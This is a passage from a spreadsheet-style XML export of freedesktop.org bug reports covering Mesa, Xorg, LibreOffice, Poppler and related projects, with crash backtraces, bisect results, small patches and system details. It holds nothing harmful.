(@CaolÃ¡n: CCed you as youâ€™re the expert in Glade :-) i hope you find a little time to cast more of your magic on this. Thanks in advance for any response!)</t>
  </si>
  <si>
    <t>DRI-59834</t>
  </si>
  <si>
    <t>[ILK]I-G-T/kms_flip subtest: 'wf_vblank-vs-modeset' fail</t>
  </si>
  <si>
    <t>Created attachment 73629
wf_vblank-vs-modeset-fail.dmesg
Environment:
--------------------
Kernel: (drm-intel-nightly)60cc7310cee5696ada10919578195d1605c05f61
Some additional commit info:
Merge: 305928b 735dc0d
Author: Daniel Vetter 
Date:   Wed Jan 23 17:57:14 2013 +0100
Description:
--------------------
Using the latest -nightly
1. /GFX/Test/Intel_gpu_tools/intel-gpu-tools/tests/kms_flip --run-subtest wf_vblank-vs-modeset
2.$?=4
3. STD-OUT:
Using monotonic timestamps
running testcase: wf_vblank-vs-modeset
Beginning wf_vblank-vs-modeset on crtc 3 connector 7
  1280x1024 60 1280 1328 1440 1688 1024 1025 1028 1066 0x5 0x48 108000
failed to page flip: Invalid argument
4.This phenomenon is very strange.Because it's not be reproduced every time.But I found some regularity:
(1)When booting ILK and standing after a time (maybe some minutes or hours)it's to likely be reproduced.
(2)When this happendrunning this subcase at the next time or morethis  phenomenon can not be reproduced anymore.
5.I attached the dmesg.</t>
  </si>
  <si>
    <t>FONTCONFIG-116</t>
  </si>
  <si>
    <t>ka.orth and Georgian capital forms</t>
  </si>
  <si>
    <t>I believe that ka.orth (Georgian) should not include the
range from U+10A0 to U+10C5 
Reasoning:
 - Section 7.5 of the Unicode standard says:
        Case Forms. The Georgian alphabet is fundamentally caseless and
        is used as such in most texts. The scholar Akaki Shanidze
        attempted to introduce a casing practice for Georgian in the
        1950s but it failed to gain popularity. In this typographic
        departure the Asomtavruli forms serve to represent uppercase
        letters while the lowercase is Mkhedruli or Nuskhuri. [...] The
        Unicode encoding of Georgian follows the Latin analogy: The
        range U+10A0..U+10CF is used to encode the uppercase capital
        forms (Asomtavruli) and the basic alphabetic range
        U+10D0..U+10FF may be regarded as lowercase (Mkhedruli or
        Nuskhuri).  [...]
 - The font that Microsoft ships with Windows XP that covers 
   Georgian (SylfaenARM) includes only the lowercase forms so
   currently does not get picked up by ka.orth.</t>
  </si>
  <si>
    <t>LIBREOFFICE-36834</t>
  </si>
  <si>
    <t>Ctrl C works even when menu is disabled in Basic IDE</t>
  </si>
  <si>
    <t>Ctrl C will copy empty string to clipboard (even if the menu Copy is
disabled)</t>
  </si>
  <si>
    <t>POPPLER-6609</t>
  </si>
  <si>
    <t>poppler does not show texts in this pdf documents</t>
  </si>
  <si>
    <t>tested on version 0.5.1 with evince 0.5.2 on Ubuntu breezy.</t>
  </si>
  <si>
    <t>frederic.parrenin</t>
  </si>
  <si>
    <t>POPPLER-47063</t>
  </si>
  <si>
    <t>logic error in Rendition parsing code</t>
  </si>
  <si>
    <t>Created attachment 58128
Patch that fixes MediaRendition parsing
The parsing code for MediaRendition contains an logic error which causes valid media rendition objects to be marked as invalid ones.
The PDF references says in Table 9.6: P dictionary (Required if C is not present otherwise optional).
Or in other words: if (!C &amp;&amp; !P) -&gt; error
but the current implementation does: if (!P &amp;&amp; C) -&gt; error
The attached patch fixes this.</t>
  </si>
  <si>
    <t>tobias.koenig</t>
  </si>
  <si>
    <t>LIBREOFFICE-42784</t>
  </si>
  <si>
    <t>BorderLine do not work</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #33397 +++
BorderLine do not work using LibreOffice 3.4.4 api (and it works using OpenOffice.org 3.3.0 api)
Sub upRahmenUnten(nAPosSP nAPosZ nEPosSP nEPosZ As Long)
'Rand unten einfÃ¼gen Ãœbergabevariablen: AnfangsPosSpalte AnfangsPosZeile EndPosSpalte EndPosZeile
Dim oRahmenEinfach as New com.sun.star.table.BorderLine
With oRahmenEinfach
	.Color = rgb(0 0 0)
	.InnerLineWidth = 2 
	.OuterLineWidth = 0
	.LineDistance = 0
End With
oBenutzterBereich = oSheet.getCellRangeByPosition(nAPosSPnAPosZnEPosSPnEPosZ).TableBorder
oBenutzterBereich.BottomLine = oRahmenEinfach
oSheet.getCellRangeByPosition(nAPosSPnAPosZnEPosSPnEPosZ).TableBorder = oBenutzterBereich
End Sub</t>
  </si>
  <si>
    <t>asw244</t>
  </si>
  <si>
    <t>MESA-30016</t>
  </si>
  <si>
    <t>[r300g bisected] glxgears (and many others) crash</t>
  </si>
  <si>
    <t>Introduced with this commit:
commit d2f4ceaa47695f9dc203c28b39d332eea8a115b2
Author: Marek OlÅ¡Ã¡k 
Date:   Wed Sep 1 08:10:32 2010 +0200
    r300/compiler: compute the final number of temporaries during translation
    And not during the register allocation which may be skipped for debugging
    purposes. Also the predicate register is now added to the number of temps.
glxgears crash:
r300 VP: Compiler error:
Too many temporaries.
Using a dummy shader instead.
r300 VP: Compiler error:
Too many temporaries.
Using a dummy shader instead.
r300 VP: Cannot compile the dummy shader! Giving up...
Program received signal SIGABRT Aborted.
0x00110416 in __kernel_vsyscall ()
(gdb) bt
#0  0x00110416 in __kernel_vsyscall ()
#1  0x0036d561 in raise () from /lib/libc.so.6
#2  0x0036efce in abort () from /lib/libc.so.6
#3  0x00d1e67a in r300_translate_vertex_shader (r300=0x8063680 vs=0x8066e90)
    at r300_vs.c:241
#4  0x00d1e47b in r300_dummy_vertex_shader (r300=0x8063680 shader=0x8066e90)
    at r300_vs.c:191
#5  0x00d1e69a in r300_translate_vertex_shader (r300=0x8063680 vs=0x8066e90)
    at r300_vs.c:245
#6  0x00d1b031 in r300_create_vs_state (pipe=0x8063680 shader=0xbfffec8c)
    at r300_state.c:1738
#7  0x00f3a22f in ureg_create_shader (ureg=0x8064240 pipe=0x8063680)
    at tgsi/tgsi_ureg.c:1460
#8  0x00f6d4f4 in ureg_create_shader_and_destroy (p=0x8064240 pipe=0x8063680)
    at ./tgsi/tgsi_ureg.h:126
#9  0x00f6da8f in util_make_vertex_passthrough_shader (pipe=0x8063680 
    num_attribs=2 semantic_names=0xbfffed74 semantic_indexes=0xbfffed6c)
    at util/u_simple_shaders.c:81
#10 0x00f3f6c0 in util_blitter_create (pipe=0x8063680) at util/u_blitter.c:220
#11 0x00d086e6 in r300_create_context (screen=0x8083fe0 priv=0x0)
    at r300_context.c:447
#12 0x00e19be7 in create_context (api=API_OPENGL smapi=0x8083ea0 
    visual=0xbfffefc4 shared_stctxi=0x0) at state_tracker/st_manager.c:624
#13 0x00e19ce3 in st_api_create_context (stapi=0x106af00 smapi=0x8083ea0 
    visual=0xbfffefc4 shared_stctxi=0x0) at state_tracker/st_manager.c:654
#14 0x00ced3c2 in dri_create_context (api=API_OPENGL visual=0x8087d58 
    cPriv=0x8087840 sharedContextPrivate=0x0) at dri_context.c:79
#15 0x00ced1a9 in dri2_create_context (api=API_OPENGL visual=0x8087d58 
    cPriv=0x8087840 sharedContextPrivate=0x0) at dri2.c:458
#16 0x00ce8a70 in dri2CreateNewContextForAPI (screen=0x8083d58 api=0 
    config=0x8087d58 shared=0x0 data=0x808a8a0)
    at ../../../../src/mesa/drivers/dri/common/dri_util.c:664
#17 0x00ce8abf in dri2CreateNewContext (screen=0x8083d58 config=0x8087d58 
    shared=0x0 data=0x808a8a0)
    at ../../../../src/mesa/drivers/dri/common/dri_util.c:678
#18 0x044fdad0 in ?? () from /usr/lib/libGL.so.1
#19 0x044dd664 in ?? () from /usr/lib/libGL.so.1
#20 0x044de2d9 in glXCreateContext () from /usr/lib/libGL.so.1
#21 0x0804a362 in ?? ()
#22 0x00357de6 in __libc_start_main () from /lib/libc.so.6
#23 0x08049131 in ?? ()
My system:
GPU: RV530
kernel: 2.6.35
mesa: 280665be7026c978acead9713c10271c36a571ee
xserver: 1.9.0
libdrm: 2.4.21</t>
  </si>
  <si>
    <t>MESA-24972</t>
  </si>
  <si>
    <t>xorg freezes when setting up a second screen</t>
  </si>
  <si>
    <t>hardware:
intel gma945
software:
intel 2.9.1 drivers
xorg 1.7.1
Mesa 7.6
kernel 2.6.31 (tested 2.6.32-rc6)
the issue is only apparent after a suspend. when booting with display attached everything works as it should.
if i have the dual screen setup and i suspend after resume 100% it will die back to gdm login screen
dmesg comes out clean. so does Xorg.0.log
my xorg.conf has a modeline set since this monitor lost its hability to provide an EDID but removing it didnt fix the issue.
any tests i can try out to further debug this?
thanks</t>
  </si>
  <si>
    <t>XORG-11816</t>
  </si>
  <si>
    <t>Driver/nsc</t>
  </si>
  <si>
    <t>xf86-video-nsc fails to communicate with the card on xorg-xserver 1.2.0 and later</t>
  </si>
  <si>
    <t>The reason being the removal of a deprecated XFree86Server define.
This driver contains a lot of compatibility code which depends on it to use
the correct INB/OUTB method. Without XFree86Server the driver compiles cleanly
but fails at runtime with the following error uttered into Xorg.log:
xf86MapVidMem: Could not mmap framebuffer (0x000000000xfe280000) (Cannot allocate memory)
A temporary fix is to add -DXFree86Server to CFLAGS.
I would of search/replaced the driver tree and generated a patch but I'm not sure what to substitute for XFree86Server.</t>
  </si>
  <si>
    <t>antti.andreimann</t>
  </si>
  <si>
    <t>XORG-2874</t>
  </si>
  <si>
    <t>symbols/pc/us overrides RWIN LWIN MENU when 'us' layout is secondary group.</t>
  </si>
  <si>
    <t>To test these options I used the following commandline:
  setxkbmap -option -option grp:rwin_toggle grp_led:scroll dvorakus
In the cases of grp:rwin_toggle grp:lwin_toggle and grp:menu_toggle I was
able to switch from dvorak to us but not us to dvorak.
I also tried grp:toggle and grp:ctrl_shift_toggle and these both seemed to work
properly switching from dvorak to us and also us to dvorak.
The interesting thing is that switching the group order fixed the problem:
  setxkbmap -option -option grp:rwin_toggle grp_led:scroll usdvorak
Worked properly able to switch from us to dvorak and back again.
So perhaps this is some problem with the dvorak layout?</t>
  </si>
  <si>
    <t>i.am</t>
  </si>
  <si>
    <t>WOCKY-26267</t>
  </si>
  <si>
    <t>date: invalid date `@2147603392'</t>
  </si>
  <si>
    <t>On systems with 32-bit time_t tests/Makefile.am tries to set a date that is now further in the future than the limit of time_t (2038) resulting in failure.
More precisely it sets a date 28 years in the future. Reduce the delta to 10 or 20 years perhaps?</t>
  </si>
  <si>
    <t>DBUS-48277</t>
  </si>
  <si>
    <t>either avoid requiring GNU make or document that it's required</t>
  </si>
  <si>
    <t>Created attachment 59461
don't use GNUmake idiom
Hi.
Trying to build dbus on BSD systems ends up with the following error:
Using $&lt; in a non-suffix rule context is a GNUmake idiom (line 1440 of Makefile)
The attached patch allows to build with both GNUmake and BSDmake.
Thoughts?</t>
  </si>
  <si>
    <t>ajacoutot</t>
  </si>
  <si>
    <t>XORG-287</t>
  </si>
  <si>
    <t>xdm won't run on non-IPv6 system if built with IPv6 support</t>
  </si>
  <si>
    <t>Reported by Peter Breitenlohner  in a thread on devel@XFree86.org:
&gt; I fully understand that XFree86 has to support IPv6. The current
&gt; implementation has however a serious flaw: when compiled with IPv6 support
&gt; (which is the default for most linux/gnu systems) the progams implicitly
&gt; assume that IPv6 is supported by the kernel. In our case that is not so and
&gt; in order to get things working I had to
&gt; 	#define BuildIPv6		NO
&gt; in xc/config/cf/host.def thereby permanantly disabling IPv6 support.
&gt; It would be extremely helpful if one could compile XFree86 with IPv6
&gt; support but then disable IPv6 at runtime via configuration files
&gt; (resources) and/or command line options (in order to avoid various
&gt; timeouts) and the programs should automatically fall back to IPv4 in case
&gt; IPv6 is not supported by the kernel.
&gt; The actual problems encountered were twofold:
&gt; 1. xdm produced an error message
&gt; 	chooser socket creation failed
&gt; and there was just a useless parent process but no child process(es) and no
&gt; Xserver was started. I think the lines 69ff in xc/programs/xdm/socket.c
&gt; 	#if defined(IPv6) &amp;&amp; defined(AF_INET6)
&gt; 	    chooserFd = socket (AF_INET6 SOCK_STREAM 0)
&gt; 	#else
&gt; 	    chooserFd = socket (AF_INET SOCK_STREAM 0)
&gt; 	#endif
&gt; ought to be
&gt; 	#if defined(IPv6) &amp;&amp; defined(AF_INET6)
&gt; 	    chooserFd = socket (AF_INET6 SOCK_STREAM 0)
&gt; 	    if (chooserFd == -1)
&gt; 	#endif
&gt; 	    chooserFd = socket (AF_INET SOCK_STREAM 0)
&gt; although I haven't tested this.
&gt; 2. Trying to start chooser by hand lead to a segmentation fault! With a
&gt; little tracing I found the following code in xc/programs/xdm/chooser.c in
&gt; lines 844ff
&gt; 	#if defined(IPv6) &amp;&amp; defined(AF_INET6)
&gt; 	    socket6FD = socket (AF_INET6 SOCK_DGRAM 0)
&gt; 	#endif
&gt; and later in lines 856ff
&gt; 	    XtAddInput (socketFD (XtPointer) XtInputReadMask ReceivePacket
&gt; 			(XtPointer) 
&gt; 	#if defined(IPv6) &amp;&amp; defined(AF_INET6)
&gt; 	    XtAddInput (socket6FD (XtPointer) XtInputReadMask ReceivePacket
&gt; 			(XtPointer) 
&gt; 	#endif
&gt; The second code fragment certainly ought to be
&gt; 	    XtAddInput (socketFD (XtPointer) XtInputReadMask ReceivePacket
&gt; 			(XtPointer) 
&gt; 	#if defined(IPv6) &amp;&amp; defined(AF_INET6)
&gt; 	    if (socket6FD != -1)
&gt; 	    XtAddInput (socket6FD (XtPointer) XtInputReadMask ReceivePacket
&gt; 			(XtPointer) 
&gt; 	#endif
&gt; but that may not suffice. Calling XtAddInput with a untested first argument
&gt; is just asking for serious trouble.</t>
  </si>
  <si>
    <t>LIBREOFFICE-43867</t>
  </si>
  <si>
    <t>MAILMERGE: Mail Merge with ole object in header of document causes crash. SfxObjectShell::GetEmbeddedObjectContainer</t>
  </si>
  <si>
    <t>Created attachment 54474
Zip file containing example document name list crash logs
Problem description: 
When running mail merge with a document header that contains an image libre office crashes out with no error or warning
Steps to reproduce:
Run Mail Merge
Create new document
In Document insert a default header
Edit header add a few blank lines
Add an image into the header
Add text into rest of document
run mail merge print or create merged document
Current behavior:
LibreOffice crashes
Expected behavior:
Create the merged document w/o crashing !
Platform (if different from the browser): 
OS:  Linux 2.6.34.10-0.4-desktop x86_64
System:  openSUSE 11.3 (x86_64)
KDE:  4.4.4 (KDE 4.4.4) release 3
Browser: Mozilla/5.0 (X11 U Linux x86_64 en-US) AppleWebKit/534.16 (KHTML like Gecko) Chrome/10.0.648.205 Safari/534.16</t>
  </si>
  <si>
    <t>paul.e.rolfe</t>
  </si>
  <si>
    <t>MESA-90167</t>
  </si>
  <si>
    <t>[softpipe] piglit depthstencil-default_fb-drawpixels-32f_24_8_rev regression</t>
  </si>
  <si>
    <t>mesa: 13b2e6a520d1f8979fc4da1dd2c6811585b16203 (master 10.6.0-devel)
$ ./bin/fbo-depthstencil drawpixels default_fb 32F_24_8_REV -auto
Testing default_fb.
Testing 32F_24_8_REV.
Testing glDrawPixels(depthstencil).
Stencil at 00   Expected: 0x33   Observed: 0xff
Stencil at 10   Expected: 0x33   Observed: 0xff
Stencil at 20   Expected: 0x33   Observed: 0xff
Stencil at 30   Expected: 0x33   Observed: 0xff
Stencil at 40   Expected: 0x33   Observed: 0xff
Stencil at 50   Expected: 0x33   Observed: 0xff
Stencil at 60   Expected: 0x33   Observed: 0xff
Stencil at 70   Expected: 0x33   Observed: 0xff
Stencil at 80   Expected: 0x33   Observed: 0xff
Stencil at 90   Expected: 0x33   Observed: 0xff
Stencil at 100   Expected: 0x33   Observed: 0xff
Stencil at 110   Expected: 0x33   Observed: 0xff
Stencil at 120   Expected: 0x33   Observed: 0xff
Stencil at 130   Expected: 0x33   Observed: 0xff
Stencil at 140   Expected: 0x33   Observed: 0xff
Stencil at 150   Expected: 0x33   Observed: 0xff
Stencil at 160   Expected: 0x33   Observed: 0xff
Stencil at 170   Expected: 0x33   Observed: 0xff
Stencil at 180   Expected: 0x33   Observed: 0xff
...
Total failures: 14884
PIGLIT: {result: fail }
8a41cd2407c1d219cba98add69609ce3a65b5435 is the first bad commit
commit 8a41cd2407c1d219cba98add69609ce3a65b5435
Author: Dave Airlie 
Date:   Wed Apr 22 17:13:06 2015 +1000
    softpipe: fix stencil write to use an integer value
    This fixes a number of regressions since
    61393bdcdc3b63624bf6e9730444f5e9deeedfc8
    u_tile: fix stencil texturing tests under softpipe
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=89960
    Reviewed-by: Brian Paul 
    Reviewed-by: Roland Scheidegger 
    Signed-off-by: Dave Airlie 
:040000 040000 c98019756adb79e5dd7b8b6f718cc61036c3a502 3a62a6bff9e5ea0584b4d93d0e1d81defa05cc6a M	src
bisect run success</t>
  </si>
  <si>
    <t>XORG-11302</t>
  </si>
  <si>
    <t>compiling with per-target flags requires AM_PROG_CC_C_O in configure.ac</t>
  </si>
  <si>
    <t>Many of the modules the git_xorg.sh script gets and ./util/modular/build.sh builds produces this warning message while building:
Building app module component xlsclients...
[...]
Makefile.am:27: compiling `xlsclients.c' with per-target flags requires `AM_PROG_CC_C_O' in `configure.ac'
The warning will go away (along with its root cause) when a AM_PROG_CC_C_O macro reference is added to configure.ac e.g. after the AC_PROG_CC line.</t>
  </si>
  <si>
    <t>MESA-28847</t>
  </si>
  <si>
    <t>Regnum Online: shader backend not rendering</t>
  </si>
  <si>
    <t>The game Regnum Online (MMO but can be downloaded and played at no cost) only runs if Safe Mode is selected in the options. 
With r300c I get these errors:
drmRadeonCmdBuffer: -22. Kernel failed to parse or rejected command stream. See dmesg for more info.
Found 4 messages leaked
[...]
[ 9468.240398] radeon 0000:01:00.0: (PW 1) Vertex array 0 need 268396832 dwords have 47104 dwords
[ 9468.240402] [drm:r100_cs_track_check] *ERROR* Max indices 16774802
[ 9468.240404] [drm:radeon_cs_ioctl] *ERROR* Invalid command stream !
With r300g the game starts but doesn't render correctly (see attached screenshot).
The game is run with Fixed pipeline set in the options using shaders will apprently need the new glsl2 compiler.
System environment:
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- GPU: RV570
-- Model: Asus EAX1950Pro 256MB
-- Display connector: DVI
-- xf86-video-ati: 801e83227a59a29eea425ea612083bbf2b536c30
-- xserver: 1.8.1.901
-- mesa: 75acb896c6da758d03e86f8725d6ca0cb2c6ad82
-- drm: 6ea2bda5f5ec8f27359760ce580fdad3df0464df
-- kernel: 2.6.35-rc3</t>
  </si>
  <si>
    <t>MESA-59450</t>
  </si>
  <si>
    <t>SIGSEGV src/mesa/state_tracker/st_cb_blit.c:216</t>
  </si>
  <si>
    <t>mesa: 780c2cb42bc7bff9f89a998effb732bdcd72630b (master)
Run piglit ARB_ES2_compatiblity FBO blit to missing attachment test on softpipe or llvmpipe.
$ ./bin/fbo-missing-attachment-blit es2 to -auto
Testing blit from complete buffer to buffer with missing attachment...
Segmentation fault (core dumped)
(gdb) bt
#0  0x00007fb648e442ff in st_BlitFramebuffer (ctx=0x1702c90 srcX0=0 srcY0=0 srcX1=32 srcY1=32 
    dstX0=0 dstY0=0 dstX1=32 dstY1=32 mask=16640 filter=9728)
    at src/mesa/state_tracker/st_cb_blit.c:216
#1  0x00007fb648cad257 in _mesa_BlitFramebuffer (srcX0=0 srcY0=0 srcX1=32 srcY1=32 dstX0=0 dstY0=0 
    dstX1=32 dstY1=32 mask=16640 filter=9728) at src/mesa/main/fbobject.c:3057
#2  0x00007fb64b54db6a in stub_glBlitFramebuffer (srcX0=0 srcY0=0 srcX1=32 srcY1=32 dstX0=0 dstY0=0 
    dstX1=32 dstY1=32 mask=16640 filter=9728)
    at piglit/tests/util/generated_dispatch.c:1523
#3  0x0000000000401625 in do_blit_test (use_es2=true from_missing_to_complete=false)
    at piglit/tests/spec/arb_es2_compatibility/fbo-missing-attachment-blit.c:160
#4  0x000000000040183e in piglit_init (argc=3 argv=0x7fff202693b8)
    at piglit/tests/spec/arb_es2_compatibility/fbo-missing-attachment-blit.c:214
#5  0x00007fb64b54a879 in run_test (gl_fw=0x7fb64b813820  argc=3 argv=0x7fff202693b8)
    at piglit/tests/util/piglit-framework-gl/piglit_glut_framework.c:125
#6  0x00007fb64b54898d in piglit_gl_test_run (argc=3 argv=0x7fff202693b8 config=0x7fff202692a0)
    at piglit/tests/util/piglit-framework-gl.c:127
#7  0x0000000000401286 in main (argc=4 argv=0x7fff202693b8)
    at piglit/tests/spec/arb_es2_compatibility/fbo-missing-attachment-blit.c:67
(gdb) frame 0
#0  0x00007fb648e442ff in st_BlitFramebuffer (ctx=0x1702c90 srcX0=0 srcY0=0 srcX1=32 srcY1=32 
    dstX0=0 dstY0=0 dstX1=32 dstY1=32 mask=16640 filter=9728)
    at src/mesa/state_tracker/st_cb_blit.c:216
216	         struct pipe_surface *dstSurf = dstRb-&gt;surface
(gdb) info locals
srcRb = 0x1758640
dstRb = 0x0
srcSurf = 0x1758990
dstSurf = 0x1702c90
srcAtt = 0x1759060
depthStencil = 1280
st = 0x1749e30
pFilter = 0
readFB = 0x1758e10
drawFB = 0x17589d0
clip = {srcX0 = 0 srcY0 = 0 srcX1 = 32 srcY1 = 32 dstX0 = 0 dstY0 = 0 dstX1 = 32 dstY1 = 32}
blit = {dst = {resource = 0x850000001741c70 level = 24128656 box = {x = 0 y = 0 z = 0 width = 32 
      height = 32 depth = 1} format = 32767} src = {resource = 0x2a48d03f1f level = 539398160 box = {
      x = 0 y = 0 z = 32694 width = 32 height = 32 depth = 1} format = 32694} mask = 15 
  filter = 0 scissor_enable = 0 '\000' scissor = {minx = 42 miny = 0 maxx = 36928 maxy = 8230}}
__FUNCTION__ = st_BlitFramebuffer
ab36ca061412c49143a5f2af53bee862fbd40351 is the first bad commit
commit ab36ca061412c49143a5f2af53bee862fbd40351
Author: Anuj Phogat 
Date:   Tue Dec 11 20:17:47 2012 -0800
    mesa: Add error checking in _mesa_BlitFramebuffer() for MRTs
    This patch adds required error checking in _mesa_BlitFramebuffer() when
    blitting to multiple color render targets. It also fixes a case when
    blitting to a framebuffer with renderbuffer/texture attached to
    GL_COLOR_ATTACHMENT{i} (where i!=0). Earlier it skips color blitting if
    nothing is found attached to GL_COLOR_ATTACHMENT0.
    V2: Fixed a case when number of draw buffer attachments are zero.
    V3: Do compatible_color_datatypes() and compatible_resolve_formats()
        check for all the draw renderbuffers in fbobject.c. Fix debug code
        at bottom of _mesa_BlitFramebuffer() to handle MRTs. Combine error
        checking code for linear blits with other color blit error checking.
    Signed-off-by: Anuj Phogat 
    Reviewed-by: Kenneth Graunke 
    Reviewed-by: Ian Romanick 
:040000 040000 d7ff03a64bb3af0c2f754bc266ce791fea98cf25 98d5e6ea72f2fcf765cd8241682ab18c8081cc70 M	src
bisect run success</t>
  </si>
  <si>
    <t>POPPLER-46964</t>
  </si>
  <si>
    <t>[patch] possible regression poppler 4Mar12 pdftops makes postscript arrays 65535 times larger than 0.18.4</t>
  </si>
  <si>
    <t>Created attachment 58010
patch against poppler cloned from git on 4Mar12
The size of arrays with image data changed from using outerSize to size.
For example when I compare pdftops output-pdftopsbug.pdf (my test file for slanted text) I get sequences like the one below where the 1 array dup is from 0.18.4 and the  array dup is from a git clone from 4Mar12.
Since the 0.18.4 version works I think that the larger allocation is unnecessary and might cause problems by wasting memory in the postscript interpreter.
William
Comparison of 0.18.4 and git 4Mar12.
-1 array dup /ImData_79_0 exch def
+1031 array dup /ImData_79_0 exch def
 1031 array 1 index 0 2 index put
 dup 0 ...
 dup 1 ...
 dup 1029 ...
 1030  put
 pop
-1 array dup /ImData_85_0 exch def
+1053 array dup /ImData_85_0 exch def
 1053 array 1 index 0 2 index put
 dup 0 ...
 dup 1 ...
@@ -245877 +245957 @@
 dup 1051 ...
 1052  put
 pop
-1 array dup /ImData_91_0 exch def
+1062 array dup /ImData_91_0 exch def
 1062 array 1 index 0 2 index put
PSOutput.cc switched from using outerSize in 0.18.4 to size in git 4Mar12.
--- /u3/gnu/poppler-0.18.4-wb/poppler/PSOutputDev.cc    2012-02-23 04:45:01.768411089 +0100
+++ /u3/gnu/poppler-git-4mar12-wb/poppler/PSOutputDev.cc        2012-03-04 19:50:18.430407830 +0100
@@ -278022 +285122 @@
     }
   } while (c != (useASCIIHex ? '&gt;' : '~') 
   // add one entry for the final line of data add another entry
   // because the RunLengthDecode filter may read past the end
   ++size
   if (useRLE) {
     ++size
   }
   outerSize = size/65535 + 1
-  writePSFmt({0:d} array dup /ImData_{1:d}_{2:d} exch def\n
-            outerSize id.num id.gen)
+  writePSFmt({0:d} array dup /{1:s}Data_{2:d}_{3:d} exch def\n
+            size mask ? Mask : Im id.num id.gen)
   str-&gt;close()
   // write the data into the array
   str-&gt;reset()
   for (outer = 0outer &lt; outerSizeouter++) {
     int innerSize = size &gt; 65535 ? 65535 : size
     // put the inner array into the outer array
     writePSFmt({0:d} array 1 index {1:d} 2 index put\n
               innerSize outer)</t>
  </si>
  <si>
    <t>LIBREOFFICE-41815</t>
  </si>
  <si>
    <t>test because of problems with receiving notification mails from FreeDesktop</t>
  </si>
  <si>
    <t>Freedesktop seems to have quit again to send me notifications :-(</t>
  </si>
  <si>
    <t>XORG-831</t>
  </si>
  <si>
    <t>RENDER hangs on several different multiheaded configurations</t>
  </si>
  <si>
    <t>Please see the referenced Red Hat bug for details.</t>
  </si>
  <si>
    <t>fche</t>
  </si>
  <si>
    <t>CAIROMM-36020</t>
  </si>
  <si>
    <t>Context::set_dash throws vector subscript out of range on VS2008</t>
  </si>
  <si>
    <t>Setting dash to empty requires passing of an empty vector.
In VisualStudio 2008 an exception is thrown due to dereference of first element of an empty vector which is not allowed (in GCC it is allowed and code below works correctly). This applies to debug and release builds with default SCL_SECURE configuration.
void Context::set_dash(std::vector&amp; dashes double offset)
{
  cairo_set_dash(cobj() 
  check_object_status_and_throw_exception(*this)
}
a proposed solution is to add specific check
void Context::set_dash(std::vector&amp; dashes double offset)
{
  cairo_set_dash(cobj() dashes.size()?
  check_object_status_and_throw_exception(*this)
}
The same is applicable for const version of the function.
This fixes issue for me.
Interesting discusion of this problem can be found at:
http://stackoverflow.com/questions/3829788/using-operator-on-empty-stdvector</t>
  </si>
  <si>
    <t>rkurjata</t>
  </si>
  <si>
    <t>DRI-93232</t>
  </si>
  <si>
    <t>GPU HANG: ecode 8:2:0x0000000a in X [5392] reason: Ring hung action: reset</t>
  </si>
  <si>
    <t>Created attachment 120308
error
Reporting here as per dmesg instructions.
Error happens at boot time (100% reproducible).
HW is an ASUS f555 laptop with hybrid intel/AMD graphics (muxless) same as per similar (same?) error already reported in bug #92326 (but with newer sw).
mauro@pedro ~ $ uname -a
Linux pedro 4.2.6-nrj-laptop-1rosa-x86_64 #1 SMP PREEMPT Sun Nov 22 17:54:44 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
mauro@pedro ~ $ lspci | grep VGA
00:02.0 VGA compatible controller: Intel Corporation Broadwell-U Integrated Graphics (rev 09)
04:00.0 VGA compatible controller: Advanced Micro Devices Inc. [AMD/ATI] Mars LE [Radeon HD 8530M / R5 M240] (rev ff)
libdrm version is 2.4.64</t>
  </si>
  <si>
    <t>mauro.decarolis</t>
  </si>
  <si>
    <t>MESA-95194</t>
  </si>
  <si>
    <t>[BDWGT3e] piglit.spec.arb_shader_image_load_store.shader-mem-barrier fails</t>
  </si>
  <si>
    <t>This test passes on BDWGT2 but fails on BDWGT3e
PIGLIT: {subtest: {Fragment shader/'coherent' qualifier memory barrier test/modulus=64 : pass}}
Probe value at (88 2 0 0)
  Expected: 33.000000
  Observed: 13697232.000000
PIGLIT: {subtest: {Vertex shader/'volatile' qualifier memory barrier test/modulus=64 : fail}}
Probe value at (220 24 0 0)
  Expected: 33.000000
  Observed: 5111885.000000
Mesa's CI has not been executing piglit on all BDW sku's.  It is possible that it never worked on this platform.</t>
  </si>
  <si>
    <t>XORG-9368</t>
  </si>
  <si>
    <t>non portable sed usage in xorgversion.m4</t>
  </si>
  <si>
    <t>BSD and Solaris sed use basic regular expressions. That meanss that [^.]+
construct used in xorgversion.m4 is doubly non portable.</t>
  </si>
  <si>
    <t>XORG-21250</t>
  </si>
  <si>
    <t>[GM965][KMS] xrandr: cannot find crtc for output VGA1</t>
  </si>
  <si>
    <t>Created attachment 24900
xorg.log
I am using kernel 2.6.30-rc2 with jbarnes' last-minute fix (drm/i915: allow tiled front buffers on 965+) manually applied xserver 1.6.1 libdrm 2.4.9 xf86-video-intel 2.7.0 on a GM965 with UXA.
With KMS I am not able to redirect output on VGA (it works without KMS).
$xrandr --verbose
Screen 0: minimum 320 x 200 current 1024 x 768 maximum 8192 x 8192
VGA1 connected (normal left inverted right x axis y axis)           
        Identifier: 0x3b                                            
        Timestamp:  245268                                          
        Subpixel:   unknown                                         
        Clones:                                                     
        CRTCs:      0 1                                             
        Transform:  1.000000 0.000000 0.000000                      
                    0.000000 1.000000 0.000000                      
                    0.000000 0.000000 1.000000                      
                   filter:                                          
        EDID_DATA:                                                  
                00ffffffffffff000000000000000000                    
                0b0e010200000000006d56a25a4e9b23                    
                164f54afcf0031ca315945596159714f                    
                818081990101000000fc003139204c43                    
                444d4f4e49544f520000000000000000                    
                00000000000000000000000000000000                    
                00000000000000000000000000000000                    
                000000000000000000000000000000ad                    
  1280x1024 (0x108)  135.0MHz +HSync +VSync                         
        h: width  1280 start 1296 end 1440 total 1688 skew    0 clock   80.0KHz
        v: height 1024 start 1025 end 1028 total 1066           clock   75.0Hz 
  1024x768 (0x109)   78.8MHz +HSync +VSync                                     
        h: width  1024 start 1040 end 1136 total 1312 skew    0 clock   60.1KHz
        v: height  768 start  769 end  772 total  800           clock   75.1Hz 
  1024x768 (0x10a)   75.0MHz -HSync -VSync                                     
        h: width  1024 start 1048 end 1184 total 1328 skew    0 clock   56.5KHz
        v: height  768 start  771 end  777 total  806           clock   70.1Hz 
  1024x768 (0x40)   65.0MHz -HSync -VSync                                      
        h: width  1024 start 1048 end 1184 total 1344 skew    0 clock   48.4KHz
        v: height  768 start  771 end  777 total  806           clock   60.0Hz 
  800x600 (0x10b)   50.0MHz +HSync +VSync                                      
